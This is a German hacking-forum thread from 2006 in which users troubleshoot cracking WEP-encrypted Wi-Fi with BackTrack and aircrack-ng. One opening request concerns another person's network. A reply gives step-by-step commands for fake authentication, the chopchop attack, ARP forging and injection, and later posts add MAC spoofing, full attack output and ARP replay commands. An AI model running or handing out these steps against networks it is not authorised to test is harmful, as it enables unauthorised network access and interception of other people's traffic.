[Habo]
Live-Habo HaBo Serence Klip Feed HaBo RSS Feed

[Habo] » Web, Network & Multimedia Palace » WLAN - Zone » Linux-Problem Backtrack Hindernisse » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Seiten (2): [1] 2 nächste » Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Backtrack Hindernisse
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
Spongebob22


Dabei seit: 18.05.2006
fav. Betriebssystem: Windows XP / Linux

Backtrack Hindernisse Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hallöle!

Betriebssystem Windows XP: ich benutze BackTrack und habe ein Centrino Notebook mit ipw2100 Driver, also integriertem Wlan...

monitor mode ist enabled, und Kismet funktioniert einwandfrei -> zeigt alles an in der Network List, jedoch bekomme ich mit aireplay: sending authentication Request -> Attack was unsuccessful (zum anderen Wlan)

Woran könnte dies liegen...kann bitte jemand helfen!?


Habe eingegeben:

airmon.sh start eth2 -> um Monitormodus zu starten

airodump eth0 /tmp/out 0 ->

BSSID, PWR, Beacons # Data, CH, MB, ENC, ESSID werden angezeigt, aber bei STATION, Packets Probes kommt nichts...warum? Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Spongebob22: 19.05.2006 01:18.

19.05.2006 00:27 Spongebob22 ist offline E-Mail an Spongebob22 senden Beiträge von Spongebob22 suchen Nehmen Sie Spongebob22 in Ihre Freundesliste auf
Google
Zum Anfang der Seite springen

Bogus


images/avatars/avatar-2979.gif

Dabei seit: 29.03.2005
fav. Betriebssystem: Windows XP u. Suse 10.0 ver

RE: Backtrack Hindernisse Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von Spongebob22
Hallöle!

Betriebssystem Windows XP: ich benutze BackTrack und habe ein Centrino Notebook mit ipw2100 Driver, also integriertem Wlan...

monitor mode ist enabled, und Kismet funktioniert einwandfrei -> zeigt alles an in der Network List, jedoch bekomme ich mit aireplay: sending authentication Request -> Attack was unsuccessful (zum anderen Wlan)

Woran könnte dies liegen...kann bitte jemand helfen!?


Habe eingegeben:

airmon.sh start eth2 -> um Monitormodus zu starten

airodump eth0 /tmp/out 0 ->

BSSID, PWR, Beacons # Data, CH, MB, ENC, ESSID werden angezeigt, aber bei STATION, Packets Probes kommt nichts...warum? Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?


^^
jop wenn du glück hast mach ja seine vieren software irgendwann mal nen update höhö hust...

__________________
Never Change a Running System 8)

Windows XP Prof
Mobile PC
2007 YEAH ... und immer noch keine fliegende Autos
21.05.2006 19:07 Bogus ist offline Homepage von Bogus Beiträge von Bogus suchen Nehmen Sie Bogus in Ihre Freundesliste auf
naked_chef


images/avatars/avatar-4215.jpg

Dabei seit: 01.09.2005
Herkunft: Berlin
fav. Betriebssystem: GNU / Linux

RE: Backtrack Hindernisse Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von Spongebob22
Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?


Jepp!
es muss je traffic da sein um ihn auszuwerten.

__________________
ROSA IS EVIL
22.05.2006 07:52 naked_chef ist offline E-Mail an naked_chef senden Homepage von naked_chef Beiträge von naked_chef suchen Nehmen Sie naked_chef in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

WEP cracken, ohne möglichkeit des ARP capturen (z.B.kein Client):

So wie ich das bisher verstanden hab kann man ohne aktiven client (der einen Arp erzeugt) nur noch mit einem etwas umständlicheren Weg an einen Arp kommen.

Und zwar wird bei der Aircrack suite auch ein tolles progrämmchen namens Arpforge mitgeliefert.
Dieses Arpforge kann aus einem .xor file einen Arp zaubern.

Dieses .xor file bekommt man durch die chop chop Attacke, es enthält den Keystream des Pakets, den Arpforge zum Verschlüsseln eines Arps verwenden kann.

also, jetzt mal für alle dies versuchen wollen zum mitschreiben:
1. Einen client im AP einloggen (bei mac filter muss man die client mac vorher z.B. mit Kismet loggen um einen gültige zu bekommen)

aireplay -1 10 -e <SSID> -b <Apmac> -h <clientmac> <interface>

2.
dann versuchen wir mit der chop attacke ein Paket zu entschlüsseln.
Hier muss die clientmac die sein, die wir gerade eingeloggt haben.

aireplay -4 -b <APmac> -h <clientmac> <interface>

3.
jetzt müssen wir den IP bereich herausfinden, da wir ja nun ein entschlüsseltes Pack haben benutzen wir dieses auch Wink :

tcpdump -s 0 -n -e -r replay_dec-XXXX-XXXXXX.cap

das replay_dec-XXXX-XXXXXX.cap ist selbstverständlich nur ein Beispiel wie das von chop chop ausgespuckte file heißen könnte, hier verwendet ihr das .cap file das chop chop euch entschlüsselt gespeichert hat.

der Output sieht dann so aus:
"reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1"

4.
jetzt kommen wir zu dem Arpforge prog.

arpforge replay_dec-XXXX-XXXXXX.xor 1 <APmac>
<clientMAC> 192.168.1.100 192.168.1.2 arp.cap

das replay_dec-XXXX-XXXXXX.xor ist das Keystream file, das wir von der chop chop erhalten haben.

<clientmac> ist wieder die eben eingeloggte MAC die wir auch schon für Aireplay verwendet haben.

192.168.1.100 ist eine source IP die im Netzwerk liegt.

Die hier wichtigste variable ist die destination IP (hier 192.168.1.2)
die haben wir eben durch das Auswerten des entschlüsselten Pakets erhalten. (siehe 3. tcpdump)

arp.cap ist das fertige Arp, das erzeugt wird.


5.
wenn alles funktionier hat, können wir jetzt wieder aireplay -3 starten, mit den in meinem ersten Post angegebenen (standard) Optionen.

6.
Jetzt injecten wir den eben erstellten Arp.

aireplay -2 -r arp.cap <interface>

nun können wir wieder mit den standard wepcracking Verfahren beginnen (mit airodump capuren und dann nach X IVs aircrack starten)

Quelle: http://www.wardriving-forum.de/

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

23.05.2006 16:17 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf

Werbung

Info: Dieser Beitrag wird automatisch generiert und enthält Werbung.

Spongebob22


Dabei seit: 18.05.2006
fav. Betriebssystem: Windows XP / Linux

Themenstarter Thema begonnen von Spongebob22
Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hört sich gut an, aber funktioniert nicht mit ipw 2100 -> ich muss erstmal meinen patchen (Kernel, Treiber und firmware) dann versuche ich es mal...

Hat jemand eine gute Patch-Anleitung.....war ja nur mal höflich gefragt Augenzwinkern


aber Danke @bahl

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Spongebob22: 23.05.2006 18:54.

23.05.2006 18:41 Spongebob22 ist offline E-Mail an Spongebob22 senden Beiträge von Spongebob22 suchen Nehmen Sie Spongebob22 in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hallo.

Die Anleitung von bahl ist echt super, ich habs auch schon oft angewendet und es funktionierte.
Jedoch hab ich neuerlich das Problem, dass das chop-choppen nicht so ganz funktioniert:

Ich logge einen client ein:
aireplay-ng -1 10 –e <myssid> –a <apmac> –h <clientmac> ath0

ich choppe:
aireplay-ng -4 –b <apmac> –h <clientmac> ath0

Dann rattert er die Prozente rauf und es steht dann da:
Warning: ICV checksum verification FAILED!

Dadurch bleibt mir die Möglichkeit verwehrt, tcpdump zu benutzen. Wenn ich es trotzdem mache, stehen keine IP-Adressen da.

Wo ist hier der Fehler begraben, oder was muss aktiviert sein, dass diese Chopchop attake funktioniert.

Danke, asterix
13.11.2006 19:51 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

das könnte daran liegen, das entweder beim übertragen Fehler auftraten und die response vom AP auf eine falsche Zieladdresse (bei verwenden von -h) oder eine falsche Source addresse (ohne verwenden von -h) gesendet wird.

weiterhin könnte es sein das der AP ein packet schickt, welches nicht den LLC/SNAP header verwendet, wobei dies äußerst unwahrscheinlich ist. aireplay nimmt an, das die ersten 6 bytes immer "\xAA\xAA\x03\x00\x00\x00" sind, was eigentlich für sämtliche gängigen protokolle auch zutrifft (ip mit tcp/udp; icmp; arp)

stimmt dies nun bei dem gegebenen packet nicht, dann wird ein falscher unverschlüsselter wert angenommen und die crc32 checksumme stimmt nicht. damit ist auch dein keystream ungültig und du kannst ihn nicht zum erstellen von validen packeten nehmen.

wenn du die zeile "The AP appears to drop packets shorter than %d bytes." liest, dann solltest du aufpassen das du nur ip bzw arp packete chopchopst, sonst kommt ebenfalls ein ungültiger keystream heraus und die ICV checksumme stimmt nicht...

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

14.11.2006 00:47 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf
Google
Zum Anfang der Seite springen

asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

hallo.

Nein, -h-Optionen werden korrekt angegeben, wie in deiner Anleitung.
Ich hab nen WRT45g-Router (v2.2) mit der dd-wrt firmware drauf. Kann ich da irgendwie nachschaun, ob dieser LLC/SNAP-Header verwendet wird?

"The AP appears to drop packets shorter than %d bytes." hab ich noch nirgends gelesen...

Kann es noch andere Gründe geben?

Danke für deine Antwort,
asterix
14.11.2006 19:05 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

hmm... und du benutzt Version 0.6.2 von Aircrack-NG?

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

14.11.2006 22:05 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Nein, auf meiner "alten" Backtrack Final 1.0 ist noch die Version 0.5 drauf.

Werd mal austesten, ob das mit der neueren funktioniert, danke für den Hinweis,

asterix
15.11.2006 21:17 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

unter Linux sollte man eh keine Probleme berichten, ausser man verwendet die aktuelle Stable Augenzwinkern edit: oder neuer...

Sag uns wenns klappt!

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von bahl: 16.11.2006 17:20.

16.11.2006 17:19 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

So, ich habe nun meiner Backtrack 1.0 die neueste Version von aircrack verpasst.
Jedoch blieb der Versuch erfolglos...

Ich habe nun die einzellnen Schritte extra rauskopiert, vielleicht hilft das weiter smile

Zu allererst ändere ich mal die MAC-Adresse meiner WLAN-Karte
code:
1:
2:
3:
slax ~ # macchanger -m 00:11:22:33:44:55 ath0
Current MAC: 00:05:4e:xx:xx:xx (Philips Components)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)


Danach gehe ich in den Monitor-Mode:
code:
1:
2:
3:
4:
5:
6:
7:
slax ~ # airmon-ng start ath0 6

usage: airmon-ng <start|stop> <interface> [channel]

Interface       Chipset         Driver

ath0            Atheros         madwifi (monitor mode enabled)


Danach logg ich mich ein. Die MAC dazu hab ich durch z.B. Kismet oder einen kurzen durchlauf von airodump-ng herausgefunden:
code:
1:
2:
3:
4:
5:
slax ~ # aireplay-ng -1 10 -e asterix -a 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0
20:07:26  Sending Authentication Request
20:07:26  Authentication successful
20:07:26  Sending Association Request
20:07:26  Association successful :-)



Nun kann man in airodump-ng den eingeloggten Client sehen:
code:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
slax ~ # airodump-ng -w out --channel 6 ath0

 CH  6 ][ Elapsed: 4 mins ][ 2006-11-19 20:11

 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:12:17:D4:6D:46   59     2770      253   6  48  WEP   asterix

 BSSID              STATION            PWR  Packets  Probes

 00:12:17:D4:6D:46  00:11:22:33:44:55   -1        3


Daraufhin chop' ich mal:
code:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
slax ~ # aireplay-ng -4 -b 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0


        Size: 78, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:12:17:D4:6D:46
         Dest. MAC  =  01:80:C2:00:00:00
        Source MAC  =  00:12:17:D4:6D:46

        0x0000:  0842 0000 0180 c200 0000 0012 17d4 6d46  .B............mF
        0x0010:  0012 17d4 6d46 003b d251 d900 57c0 0da4  ....mF.;.Q..W...
        0x0020:  9165 3010 7b08 febf 728c 8233 d603 a381  .e0.{...r..3....
        0x0030:  026c 7881 5020 a8a6 1309 0dd8 e539 5dfc  .lx.P .......9].
        0x0040:  34bc 95b4 a1dc bb4e 760a f118 99d9       4......Nv.....

Use this packet ? y

Saving chosen packet in replay_src-1119-201022.cap

Offset   77 ( 0% done) | xor = 28 | pt = F1 |  254 frames written in   763ms
Offset   76 ( 2% done) | xor = 1A | pt = 83 |  344 frames written in  1032ms
Offset   75 ( 4% done) | xor = 6C | pt = 74 |  135 frames written in   406ms
Offset   74 ( 6% done) | xor = 26 | pt = D7 |  101 frames written in   303ms
Offset   73 ( 9% done) | xor = AF | pt = A5 |  170 frames written in   509ms
Offset   72 (11% done) | xor = D3 | pt = A5 |  241 frames written in   723ms
Offset   71 (13% done) | xor = EB | pt = A5 |   66 frames written in   199ms
Offset   70 (15% done) | xor = 1E | pt = A5 |  239 frames written in   716ms
Offset   69 (18% done) | xor = 79 | pt = A5 |  204 frames written in   612ms
Offset   68 (20% done) | xor = 04 | pt = A5 |  239 frames written in   717ms
Offset   67 (22% done) | xor = 11 | pt = A5 |   31 frames written in    93ms
Offset   66 (25% done) | xor = 30 | pt = A5 |  207 frames written in   621ms
Offset   65 (27% done) | xor = BC | pt = 00 |   32 frames written in    96ms
Offset   64 (29% done) | xor = 34 | pt = 00 |  204 frames written in   612ms
Offset   63 (31% done) | xor = FC | pt = 00 |   67 frames written in   201ms
Offset   62 (34% done) | xor = 5F | pt = 02 |  240 frames written in   720ms
Offset   61 (36% done) | xor = 39 | pt = 00 |  102 frames written in   306ms
Offset   60 (38% done) | xor = F1 | pt = 14 |   32 frames written in    97ms
Offset   59 (40% done) | xor = D8 | pt = 00 |  240 frames written in   719ms
Offset   58 (43% done) | xor = 0D | pt = 00 |   67 frames written in   201ms
Offset   57 (45% done) | xor = 0B | pt = 02 |  205 frames written in   616ms
Offset   56 (47% done) | xor = 93 | pt = 80 |  207 frames written in   620ms
Offset   55 (50% done) | xor = E2 | pt = 44 |  588 frames written in  1764ms
Offset   54 (52% done) | xor = C5 | pt = 6D |  102 frames written in   307ms
Offset   53 (54% done) | xor = F4 | pt = D4 |   30 frames written in    89ms
Offset   52 (56% done) | xor = 47 | pt = 17 |  102 frames written in   307ms
Offset   51 (59% done) | xor = 93 | pt = 12 |  103 frames written in   308ms
Offset   50 (61% done) | xor = 78 | pt = 00 |   33 frames written in    99ms
Offset   49 (63% done) | xor = 6C | pt = 00 |  134 frames written in   403ms
Offset   48 (65% done) | xor = 82 | pt = 80 |  208 frames written in   622ms
Offset   47 (68% done) | xor = 81 | pt = 00 |   65 frames written in   196ms
Offset   46 (70% done) | xor = A3 | pt = 00 |  102 frames written in   307ms
Offset   45 (72% done) | xor = 03 | pt = 00 |   68 frames written in   203ms
Offset   44 (75% done) | xor = D6 | pt = 00 |  170 frames written in   510ms
Offset   43 (77% done) | xor = 77 | pt = 44 |  242 frames written in   726ms
Offset   42 (79% done) | xor = EF | pt = 6D |   67 frames written in   201ms
Offset   41 (81% done) | xor = 58 | pt = D4 |  170 frames written in   510ms
Offset   40 (84% done) | xor = 65 | pt = 17 |   67 frames written in   202ms
Offset   39 (86% done) | xor = AD | pt = 12 |  206 frames written in   616ms
Offset   38 (88% done) | xor = FE | pt = 00 |   67 frames written in   201ms
Offset   37 (90% done) | xor = 08 | pt = 00 |   32 frames written in    97ms
Offset   36 (93% done) | xor = FB | pt = 80 |   33 frames written in    99ms
Offset   35 (95% done) | xor = 10 | pt = 00 |  100 frames written in   301ms
Offset   34 (97% done) | xor = 30 | pt = 00 |  172 frames written in   516ms

Warning: ICV checksum verification FAILED!

Saving plaintext in replay_dec-1119-201044.cap
Saving keystream in replay_dec-1119-201044.xor

Completed in 20s (2.00 bytes/s)


Nun kann man dieses böse FAILED! sehen und natürlich kommt beim tcpdump nichts gscheides raus:
code:
1:
2:
3:
4:
5:
slax ~ # tcpdump -s 0 -n -e -r replay_dec-1119-200932.cap
reading from file replay_dec-1119-200932.cap, link-type IEEE802_11 (802.11)
20:09:32.771984 DA:01:80:c2:00:00:00 BSSID:00:12:17:d4:6d:46 SA:00:12:17:d4:6d:46 LLC,
dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000),
ethertype Unknown (0x0000): Unnumbered, ui, Flags [Command], length 46



Hoffe auf Hilfe, was ich da falsch mache oder was da nicht passt, ich komm nicht drauf,
danke, asterix

Dieser Beitrag wurde 2 mal editiert, zum letzten Mal von asterix: 19.11.2006 20:31.

19.11.2006 20:29 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

die Packetsource sollte wohl schon die sein, welche du spezifizierst:

code:
1:
2:
3:
4:
5:
BSSID  =       00:12:17:D4:6D:46
Dest. MAC  =   01:80:C2:00:00:00
Source MAC  = 00:12:17:D4:6D:46


nimm ein packet wo die source stimmt... du kannst eines empfangen, wenn du abmeldest.

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

19.11.2006 21:01 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Ich verstehe nicht so ganz was du meinst mit: "nimm ein packet wo die source stimmt... du kannst eines empfangen, wenn du abmeldest."

Ich habe doch keinen Client, welchen ich abmelden könnte, außer dem fake-client 00:11:22:33:44:55 ... meinst du eine deauth. attake?

Bitte um Aufklärung,
asterix
19.11.2006 21:10 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
bahl


images/avatars/avatar-2585.gif

Dabei seit: 28.04.2005
Herkunft: CH
Beruf: e-Gov Consultant
fav. Betriebssystem: Gentoo + OS X

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

BSSID=00:12:17großes Grinsen 4:6D:46 = Source MAC=00:12:17großes Grinsen 4:6D:46

Die Source mac übergibst du bei Aireplay mit "-h", hier hast du aber ein packet in dem die Source nicht stimmt.

Mach eines mit der FakeMAC cool

__________________
code:
1:
2:
root :-) # grep -ir shit /usr/src/linux
/usr/src/linux/drivers/net/sunlance.c: *      This was the sun4c killer. Shit, stupid bug.

19.11.2006 21:15 bahl ist offline E-Mail an bahl senden Homepage von bahl Beiträge von bahl suchen Nehmen Sie bahl in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

so ganz blick ich da immer nicht durch verwirrt

laut deiner anleitung sollte es doch funktionieren mit:
code:
1:
slax ~ # aireplay-ng -4 -b 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0


ich hab daraufhin mal nen filter mit -s 00:11:22:33:44:55 eingebaut, und parallel dazu fleißig nen fake-client eingeloggt, jedoch bringt das auch nichts.

ich glaub ich bin da komplett auf der falschen spur...

asterix
19.11.2006 21:49 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
d3vil


Dabei seit: 01.12.2006
fav. Betriebssystem: Windoofs XP SP2

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von asterix
So, ich habe nun meiner Backtrack 1.0 die neueste Version von aircrack verpasst.



Eine bescheidene Frage von mir: Wie hast Du dem Backtrack-iso die aktuelle Verion von aircrack verpasst? Also damit man die iso booten kann ohne es auf die HDD zu installieren?
01.12.2006 13:50 d3vil ist offline E-Mail an d3vil senden Beiträge von d3vil suchen Nehmen Sie d3vil in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

ganz einfach: man lädt die aktuelle version aus dem internet runter und installiert sie dann.

in der readme steht genaueres. man benutzt dabei den befehl make.

asterix
01.12.2006 16:18 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
d3vil


Dabei seit: 01.12.2006
fav. Betriebssystem: Windoofs XP SP2

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von asterix
ganz einfach: man lädt die aktuelle version aus dem internet runter und installiert sie dann.

in der readme steht genaueres. man benutzt dabei den befehl make.

asterix


Ich glaube, ich habe mich falsch ausgedürckt. Ich meinte folgendes:

Ich lade die Backtrack 1 final als iso herunter, darin ist antürlich die alte aircrack-suite. Wie packe ich da jetzt die aktuelle herein und erstelle dann ein iso, welches ich brennen kann, um davon dann zu booten. Also ich meine nicht, wie man aircrack installiert, wenn man zuvor Backtrack auf einer Festplatte installiert hat, sondern die Integration in das iso-image.
01.12.2006 16:48 d3vil ist offline E-Mail an d3vil senden Beiträge von d3vil suchen Nehmen Sie d3vil in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

achso, nein, das hab ich nicht gemacht, ich habs nur in die livecd installiert (und müsste es jedesmal neu installieren).

Direkt in ein iso reininstallieren kann ich mir schwer vorstellen, das sowas funktioniert.

Außerdem is eh schon eine neue Backtrack drausen, wo die neuere Version drauf is...

asterix
01.12.2006 17:55 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
d3vil


Dabei seit: 01.12.2006
fav. Betriebssystem: Windoofs XP SP2

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von asterix

Außerdem is eh schon eine neue Backtrack drausen, wo die neuere Version drauf is...

asterix


Ja, die Beta 2, allerdings läuft damit nicht ohne weiteres meine Atheros Karte unglücklich
01.12.2006 18:28 d3vil ist offline E-Mail an d3vil senden Beiträge von d3vil suchen Nehmen Sie d3vil in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

JA! das hab ich auch schon bemerkt!
Dachte, es is nur bei mir so.... hab mich auch noch nicht wirklich dahintergeklemmt, aber ich konnte die karte nicht in den monitormode versetzen!

asterix
01.12.2006 18:52 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
d3vil


Dabei seit: 01.12.2006
fav. Betriebssystem: Windoofs XP SP2

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Original von asterix
JA! das hab ich auch schon bemerkt!
Dachte, es is nur bei mir so.... hab mich auch noch nicht wirklich dahintergeklemmt, aber ich konnte die karte nicht in den monitormode versetzen!

asterix


Richtig, deshalb ja meine Frage: "Wie bindet man die aktuelle aircrack-suite in das ISO von Backtrack1 ein?"

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von d3vil: 01.12.2006 19:12.

01.12.2006 19:11 d3vil ist offline E-Mail an d3vil senden Beiträge von d3vil suchen Nehmen Sie d3vil in Ihre Freundesliste auf
asterix


Dabei seit: 28.07.2006
fav. Betriebssystem: WinXP, Linux

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Zitat:
Direkt in ein iso reininstallieren kann ich mir schwer vorstellen, das sowas funktioniert.


siehe oben.
01.12.2006 22:47 asterix ist offline E-Mail an asterix senden Beiträge von asterix suchen Nehmen Sie asterix in Ihre Freundesliste auf
d3vil


Dabei seit: 01.12.2006
fav. Betriebssystem: Windoofs XP SP2

Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

..... puh, endlich läuft jetzt alles so wie ich es mir vorstelle, aber wie erzeugt man den Traffic, wenn sich kein Client im Netz des AP befindet?

also wenn Client im Netz, dann ist es ja einfach über:

aireplay-ng -3 -b [Macadresse AP] -h [Macadresse Client der am AP angemeldet ist] -x 600 ath0

aber wie sieht es aus, wenn es den Client im Netz nicht gibt?
06.12.2006 20:43 d3vil ist offline E-Mail an d3vil senden Beiträge von d3vil suchen Nehmen Sie d3vil in Ihre Freundesliste auf
